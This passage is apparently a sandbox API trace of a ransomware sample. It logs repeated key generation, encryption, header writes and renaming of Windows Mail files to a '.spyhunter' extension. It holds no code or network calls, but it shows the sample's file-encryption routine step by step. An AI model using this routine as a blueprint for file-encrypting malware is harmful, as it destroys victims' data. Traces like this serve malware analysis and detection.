dwLen=0x20, pbBuffer=0x57ec20 | out: pbBuffer=0x57ec20) returned 1 [0155.824] GetProcessHeap () returned 0x2c0000 [0155.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.824] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec18*=0x30) returned 1 [0155.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.841] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0155.841] StrStrW (lpFirst="Peacock.htm", lpSrch=".txt") returned 0x0 [0155.841] GetProcessHeap () returned 0x2c0000 [0155.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0155.841] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ebdc*=0xe8, lpOverlapped=0x0) returned 1 [0155.842] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.842] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ebdc*=0xe8, lpOverlapped=0x0) returned 1 [0155.842] GetProcessHeap () returned 0x2c0000 [0155.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0155.842] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.842] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x57ec1c*, lpNumberOfBytesWritten=0x57ebdc*=0x4, lpOverlapped=0x0) returned 1 [0155.842] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebdc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebdc*=0x30, lpOverlapped=0x0) returned 1 [0155.842] CloseHandle (hObject=0xb0) returned 1 [0155.842] GetProcessHeap () returned 0x2c0000 [0155.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.842] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.spyhunter") returned 103 [0155.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.spyhunter")) returned 1 [0155.843] GetProcessHeap () returned 0x2c0000 [0155.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.843] GetProcessHeap () returned 0x2c0000 [0155.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.843] GetProcessHeap () returned 0x2c0000 [0155.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cb10 | out: hHeap=0x2c0000) returned 1 [0155.844] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec18 | out: pbBuffer=0x57ec18) returned 1 [0155.844] GetProcessHeap () returned 0x2c0000 [0155.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.844] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec10*=0x30) returned 1 [0155.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0155.845] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".txt") returned 0x0 [0155.845] GetProcessHeap () returned 0x2c0000 [0155.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0155.845] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ebd4*=0xed, lpOverlapped=0x0) returned 1 [0155.846] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.846] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ebd4*=0xed, lpOverlapped=0x0) returned 1 [0155.846] GetProcessHeap () returned 0x2c0000 [0155.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0155.846] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.846] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x57ec14*, lpNumberOfBytesWritten=0x57ebd4*=0x4, lpOverlapped=0x0) returned 1 [0155.846] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebd4*=0x30, lpOverlapped=0x0) returned 1 [0155.846] CloseHandle (hObject=0xb0) returned 1 [0155.846] GetProcessHeap () returned 0x2c0000 [0155.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.846] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.spyhunter") returned 110 [0155.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.spyhunter")) returned 1 [0155.847] GetProcessHeap () returned 0x2c0000 [0155.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.847] GetProcessHeap () returned 0x2c0000 [0155.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.848] GetProcessHeap () returned 0x2c0000 [0155.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b640 | out: hHeap=0x2c0000) returned 1 [0155.848] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec18 | out: pbBuffer=0x57ec18) returned 1 [0155.848] GetProcessHeap () returned 0x2c0000 [0155.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec10*=0x30) returned 1 [0155.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.848] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 96 [0155.848] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".txt") returned 0x0 [0155.848] GetProcessHeap () returned 0x2c0000 [0155.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0155.849] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ebd4*=0x107e, lpOverlapped=0x0) returned 1 [0155.862] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffef82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.862] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x107e, lpNumberOfBytesWritten=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ebd4*=0x107e, lpOverlapped=0x0) returned 1 [0155.862] GetProcessHeap () returned 0x2c0000 [0155.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0155.862] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.863] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x57ec14*, lpNumberOfBytesWritten=0x57ebd4*=0x4, lpOverlapped=0x0) returned 1 [0155.863] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebd4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebd4*=0x30, lpOverlapped=0x0) returned 1 [0155.863] CloseHandle (hObject=0xb0) returned 1 [0155.863] GetProcessHeap () returned 0x2c0000 [0155.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.863] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.spyhunter") returned 106 [0155.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.spyhunter")) returned 1 [0155.864] GetProcessHeap () returned 0x2c0000 [0155.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.865] GetProcessHeap () returned 0x2c0000 [0155.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.865] GetProcessHeap () returned 0x2c0000 [0155.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b528 | out: hHeap=0x2c0000) returned 1 [0155.865] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec10 | out: pbBuffer=0x57ec10) returned 1 [0155.865] GetProcessHeap () returned 0x2c0000 [0155.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.865] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec08*=0x30) returned 1 [0155.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0155.866] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 99 [0155.866] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".txt") returned 0x0 [0155.866] GetProcessHeap () returned 0x2c0000 [0155.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0155.866] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ebcc*=0xed, lpOverlapped=0x0) returned 1 [0155.866] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.867] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ebcc*=0xed, lpOverlapped=0x0) returned 1 [0155.867] GetProcessHeap () returned 0x2c0000 [0155.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0155.867] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.867] WriteFile (in: hFile=0xb0, lpBuffer=0x57ec0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x57ec0c*, lpNumberOfBytesWritten=0x57ebcc*=0x4, lpOverlapped=0x0) returned 1 [0155.867] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebcc*=0x30, lpOverlapped=0x0) returned 1 [0155.867] CloseHandle (hObject=0xb0) returned 1 [0155.867] GetProcessHeap () returned 0x2c0000 [0155.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.867] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.spyhunter") returned 109 [0155.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.spyhunter")) returned 1 [0155.868] GetProcessHeap () returned 0x2c0000 [0155.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.868] GetProcessHeap () returned 0x2c0000 [0155.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.868] GetProcessHeap () returned 0x2c0000 [0155.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b1e0 | out: hHeap=0x2c0000) returned 1 [0155.870] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec10 | out: pbBuffer=0x57ec10) returned 1 [0155.870] GetProcessHeap () returned 0x2c0000 [0155.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.870] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec08*=0x30) returned 1 [0155.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.922] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 92 [0155.922] StrStrW (lpFirst="Garden.jpg", lpSrch=".txt") returned 0x0 [0155.922] GetProcessHeap () returned 0x2c0000 [0155.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.922] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebcc*=0x2800, lpOverlapped=0x0) returned 1 [0155.945] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.945] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebcc*=0x2800, lpOverlapped=0x0) returned 1 [0155.945] GetProcessHeap () returned 0x2c0000 [0155.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.946] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.946] WriteFile (in: hFile=0x178, lpBuffer=0x57ec0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x57ec0c*, lpNumberOfBytesWritten=0x57ebcc*=0x4, lpOverlapped=0x0) returned 1 [0155.954] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebcc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebcc*=0x30, lpOverlapped=0x0) returned 1 [0155.954] CloseHandle (hObject=0x178) returned 1 [0155.954] GetProcessHeap () returned 0x2c0000 [0155.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.954] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.spyhunter") returned 102 [0155.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.spyhunter")) returned 1 [0155.955] GetProcessHeap () returned 0x2c0000 [0155.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.955] GetProcessHeap () returned 0x2c0000 [0155.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.955] GetProcessHeap () returned 0x2c0000 [0155.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4ca08 | out: hHeap=0x2c0000) returned 1 [0155.955] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec08 | out: pbBuffer=0x57ec08) returned 1 [0155.955] GetProcessHeap () returned 0x2c0000 [0155.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.955] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec00*=0x30) returned 1 [0155.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0155.956] StrStrW (lpFirst="edb.log", lpSrch=".txt") returned 0x0 [0155.956] GetProcessHeap () returned 0x2c0000 [0155.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.956] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebc4*=0x2800, lpOverlapped=0x0) returned 1 [0155.965] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.965] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebc4*=0x2800, lpOverlapped=0x0) returned 1 [0155.965] GetProcessHeap () returned 0x2c0000 [0155.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.965] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.965] WriteFile (in: hFile=0x178, lpBuffer=0x57ec04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x57ec04*, lpNumberOfBytesWritten=0x57ebc4*=0x4, lpOverlapped=0x0) returned 1 [0155.967] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebc4*=0x30, lpOverlapped=0x0) returned 1 [0155.967] CloseHandle (hObject=0x178) returned 1 [0155.967] GetProcessHeap () returned 0x2c0000 [0155.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.967] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.spyhunter") returned 88 [0155.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log.spyhunter")) returned 1 [0155.968] GetProcessHeap () returned 0x2c0000 [0155.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.968] GetProcessHeap () returned 0x2c0000 [0155.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0155.968] GetProcessHeap () returned 0x2c0000 [0155.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e908 | out: hHeap=0x2c0000) returned 1 [0155.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, 